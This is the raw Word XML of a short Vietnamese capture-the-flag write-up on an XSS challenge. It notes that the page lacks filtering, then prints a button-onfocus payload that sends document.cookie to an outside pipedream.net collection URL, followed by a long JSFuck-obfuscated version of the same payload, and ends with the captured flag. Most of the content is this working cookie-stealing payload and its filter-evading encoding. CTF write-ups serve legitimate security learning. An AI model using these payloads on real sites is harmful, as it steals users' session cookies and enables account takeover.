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3441" w14:textId="1AA90737" w:rsidR="00C54FA4" w:rsidRDefault="006A6721">
      <w:r>
        <w:t>Đầu tiên ta vào trang thì thấy không filter khung</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018706ED" w14:textId="77777777" w:rsidR="006A6721" w:rsidRDefault="006A6721">
      <w:r>
        <w:t>Ta sẽ genrate payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B496EB" w14:textId="4E5DDA28" w:rsidR="006A6721" w:rsidRDefault="006A6721">
      <w:r w:rsidRPr="006A6721">
        <w:t>&lt;button autofocus onfocus=(eval)(document.location='https://eon5wu9esj2rcgn.m.pipedream.net?cookie='.concat(document.cookie))&gt;&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BDCD80" w14:textId="52C332DA" w:rsidR="006A6721" w:rsidRDefault="006A6721">
      <w:r>
        <w:t>Tiếp tục đổi thành dạng đặc biệt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B5501B" w14:textId="3DCEA49B" w:rsidR="006A6721" w:rsidRDefault="006A6721">
      <w:r w:rsidRPr="006A6721">
        <w:t>&lt;button autofocus onfocus=(eval)([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]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((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])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[([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])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+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]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((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6721">
        <w:lastRenderedPageBreak/>
        <w:t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[([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])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+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]</w:t>
      </w:r>
      <w:r w:rsidRPr="006A6721">
        <w:lastRenderedPageBreak/>
        <w:t>+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]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((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])()))&gt;&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4295A134" w14:textId="5644259C" w:rsidR="006A6721" w:rsidRDefault="006A6721">
      <w:r>
        <w:t>Truyền payload vào và ta nhận được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D98E2F" w14:textId="3AF419DC" w:rsidR="006A6721" w:rsidRDefault="006A6721">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DCC1855" wp14:editId="35FF5841">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4097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1C77" w14:textId="1953C349" w:rsidR="006A6721" w:rsidRDefault="006A6721">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D0161C"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ECF3F7"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>qa26f3ugb5tqv7o0mbvtv414u8</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006A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6A6721"/>
    <w:rsid w:val="00837BE6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47A3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EA0CCF35-4EA6-45E9-BA90-0F5F1666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1851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2023-04-16T05:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-16T06:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>